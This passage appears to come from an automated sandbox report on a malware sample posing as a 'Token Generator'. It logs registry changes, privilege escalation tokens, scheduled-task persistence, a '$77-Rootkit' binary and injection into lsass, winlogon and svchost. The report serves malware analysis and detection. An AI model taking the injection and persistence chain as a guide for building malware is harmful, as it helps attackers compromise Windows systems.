Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-711569230-3659488422-571408806-1000\{99C49BB3-2594-4ACF-9A5A-F234E33DC2A6} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 987473.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Token Generator.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3276 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2756 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1872 wrote to memory of 4892 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4892 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
PID 4592 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 2396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4592 wrote to memory of 2396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4592 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
PID 4592 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3524 wrote to memory of 624 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3524 wrote to memory of 684 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3524 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 340 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3524 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 996 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1052 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1104 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1220 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1264 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1452 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1460 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1468 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1628 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1684 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1716 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1804 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1848 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1880 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1888 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1952 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1996 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1012 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 3524 wrote to memory of 2052 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2176 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2400 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2416 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2492 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2580 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2604 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 3524 wrote to memory of 2652 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

